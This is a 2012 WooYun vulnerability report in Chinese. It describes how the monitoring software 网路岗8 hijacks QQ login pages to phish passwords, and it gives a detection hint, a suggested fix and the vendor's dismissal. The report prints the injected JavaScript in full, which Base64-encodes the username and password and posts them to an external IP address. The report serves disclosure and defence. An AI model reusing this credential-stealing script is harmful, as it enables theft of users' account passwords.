当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-07248

漏洞标题:网路岗8钓鱼式盗取QQ密码(分析过程)

相关厂商:腾讯

漏洞作者: New4

提交时间:2012-05-17 16:44

修复时间:2012-05-22 16:45

公开时间:2012-05-22 16:45

漏洞类型:钓鱼欺诈信息

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-05-17: 细节已通知厂商并且等待厂商处理中
2012-05-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

网路岗软件会针对安装QQ的计算机进行攻击已经严重威胁用户隐私,首先会针对QQ登陆过程进行拦截导致QQ提示“账户异常”,随后劫持http://im.qq.com/jh网站尝试盗取QQ用户密码!成功后利用QQ密码对QQ用户进行聊天记录监控!!!

详细说明:

网路岗软件会针对安装QQ的计算机进行攻击已经严重威胁用户隐私,首先会针对QQ登陆过程进行拦截导致QQ提示“账户异常”,随后劫持http://im.qq.com/jh网站尝试盗取QQ用户密码!成功后利用QQ密码对QQ用户进行聊天记录监控!!!
劫持后的页面密码使用BASE64加密可被嗅探并解密还原:

<script language="javascript">
var BASE64={
    enKey: 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',
    deKey: new Array(
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63,
        52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1,
        -1,  0,  1,  2,  3,  4,  5,  6,  7,  8,  9, 10, 11, 12, 13, 14,
        15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1,
        -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
        41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1
    ),
    
    encode: function(src){
        var str=new Array();
        var ch1, ch2, ch3;
        var pos=0;
        while(pos+3<=src.length){
            ch1=src.charCodeAt(pos++);
            ch2=src.charCodeAt(pos++);
            ch3=src.charCodeAt(pos++);
            str.push(this.enKey.charAt(ch1>>2), this.enKey.charAt(((ch1<<4)+(ch2>>4))&0x3f));
            str.push(this.enKey.charAt(((ch2<<2)+(ch3>>6))&0x3f), this.enKey.charAt(ch3&0x3f));
        }
        if(pos<src.length){
            ch1=src.charCodeAt(pos++);
            str.push(this.enKey.charAt(ch1>>2));
            if(pos<src.length){
                ch2=src.charCodeAt(pos);
                str.push(this.enKey.charAt(((ch1<<4)+(ch2>>4))&0x3f));
                str.push(this.enKey.charAt(ch2<<2&0x3f), '=');
            }else{
                str.push(this.enKey.charAt(ch1<<4&0x3f), '==');
            }
        }
        return str.join('');
    }
};
function paswdfield_eventchange(a, b){
	var nonefm = window.document.ld;
	nonefm.u.value = BASE64.encode(a.u.value);
	nonefm.p.value = BASE64.encode(a.p.value);
	nonefm.w.value = "518000";
	nonefm.action  = "http://211.157.108.252/s?flag=WWWSOFTBARCOMWWWSOFTBARCOM";
	nonefm.target="nonewin";
	nonefm.submit();
}
</script>


漏洞证明:

劫持QQ客户端


被钓鱼后密码提交包


钓鱼页面包含“<!-- saved from url=(0077)http://aq.qq.com/cn/services/abnormal/abnormal_index -->” 信息可直接判断是否被替换。

修复方案:

QQ客户端升级修改关键算法防止数据包传输过程中被非法篡改。
由于网路岗使用QQ协议进行攻击,我想涉及的版本应该包含2010-2012 请腾讯公司尽快升级确保用户的安全。

版权声明:转载请注明来源 New4@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2012-05-22 16:45

厂商回复:

漏洞Rank:8 (WooYun评价)

最新状态:

暂无